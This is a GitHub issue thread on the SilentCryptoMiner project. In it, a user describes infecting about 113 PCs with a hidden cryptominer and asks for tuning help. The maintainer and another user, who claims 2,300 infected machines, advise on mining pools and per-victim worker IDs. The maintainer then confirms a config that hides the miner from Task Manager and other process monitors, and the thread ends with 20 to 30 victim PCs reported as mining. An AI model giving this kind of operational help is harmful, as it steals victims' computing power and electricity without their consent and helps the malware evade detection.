### ISSUE TITLE
This Is strange

### ISSUE THREAD

**Issue by R3dacted00** [UnamSanctam/SilentCryptoMiner#1379]
Hello Unam, I'm the guy whom you suggested moving to zergpool last week, up to today I should have infected potentially 113 pcs (assuming the antivirus didn't delete the miners afterwards, don't know if that's a possibility)

Now, I'm definitely missing something because of all 113 pcs not a single one got the etc miner working, could be due to the High difficulty requirements of 2miners

And about the xmr miner on ghostrider algo, this is my average hashrate:
![Screenshot_20230117-122927](https://user-images.githubusercontent.com/122580694/212890043-0dc42709-443f-4fd6-8dc3-384ff4389b65.png)

I was expecting It to be low but not THIS low, Is It normal? Could they really all have potato pcs so bad that their overall hashrate Is at max 300hs? 

And one more question, since I have the remote config Is there a way for me to see how many workers are mining? Like... Putting .{COMPUTERNAME} at the end of the wallet? (I don't know if It works with zergpool, in case do you know any other low difficulty pool I can try?)

**Comment by MJMODZZ** [comment]
> 

So you are converting the ETC to BTC? Why?

**Comment by R3dacted00** [comment]
> > 
> 
> So you are converting the ETC to BTC? Why?

No, It's XMR to BTC

**Comment by MJMODZZ** [comment]
> > > 
> > 
> > 
> > So you are converting the ETC to BTC? Why?
> 
> No, It's XMR to BTC

I actually would directly mine XMR and convert it into the wallet. Thats what i do and i mine on 2300 PCs

**Comment by UnamSanctam** [comment]
>I actually would directly mine XMR and convert it into the wallet. Thats what i do and i mine on 2300 PCs

He's coin switch mining the GhostRider algorithm since it requires less computer resources, Zergpool then automatically exchanges whatever coins it mines to BTC.

>I was expecting It to be low but not THIS low, Is It normal? Could they really all have potato pcs so bad that their overall hashrate Is at max 300hs?

It should be higher, so it sounds like most likely there aren't that many computers mining. But you can add the computer name as the worker name.

>And one more question, since I have the remote config Is there a way for me to see how many workers are mining? Like... Putting .{COMPUTERNAME} at the end of the wallet? (I don't know if It works with zergpool, in case do you know any other low difficulty pool I can try?)

In Zergpool you add the worker name into the password field like such: `c=BTC,ID={COMPUTERNAME}`

**Comment by R3dacted00** [comment]
> 

Unam suggested me to do like this though, anyway I'm sorry but we're getting out of the topic of my first questions, thanks you but I'd like to keep the discussion on that focus

**Comment by MJMODZZ** [comment]
I actually mine with 2miners and usual XMR algo.

**Comment by R3dacted00** [comment]
> 

So my settings would look like this?
 # #

> {
    "algo": "gr",
    "pool": "ghostrider.mine.zergpool.com",
    "port": 15354,
    "wallet": "bc1q2g4q7aa2c0gdmmwxw55jwhq83km2kwdt4d8sz3",
    "password": "c=BTC,ID={COMPUTERNAME}",
    "nicehash": false,
    "ssltls": true,
    "max-cpu": 50,
    "idle-wait": 10,
    "idle-cpu": 50,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe",
    "kill-targets": "",
    "stealth-fullscreen": false
}

**Comment by MJMODZZ** [comment]
> > 
> 
> > I actually mine with 2miners and usual XMR algo.
> 
> I tried that too but the pcs I infected have very bad specs overall so on 2miners I didn't get any share

Ah damn, the PCs i have infected can all run MW2 means they have OK-Very good specs = more profit

**Comment by UnamSanctam** [comment]
>So my settings would look like this?

Yes that would be correct.

**Comment by R3dacted00** [comment]
> Yes that would be correct.

Thanks, I'll see how many workers are actually infected

**Comment by R3dacted00** [comment]
Well this Is very strange, It shows only one active worker, could It be that of all the 113 people who downloaded the miner only one actually clicked on It?
![Screenshot_20230117-153407](https://user-images.githubusercontent.com/122580694/212926374-b48acb82-6547-4db0-9813-ac76d2408556.png)
I expected the actual number to be like 10 or 20 workers succesfully set up, not 113 of course but... I don't know, I will try to test It with other PCs I can physically put my hands on to see if It's the antivirus that's blocking the miner once the user re-enables it. Thanks for the help again, I'm learning a lot here

**Comment by R3dacted00** [comment]
Ok, a brunch of new workers are popping up, so I'll be closing this discussion, as expected 20-30 low end PCs were succesfully infected. Thanks again for the help.

**Comment by R3dacted00** [comment]
?
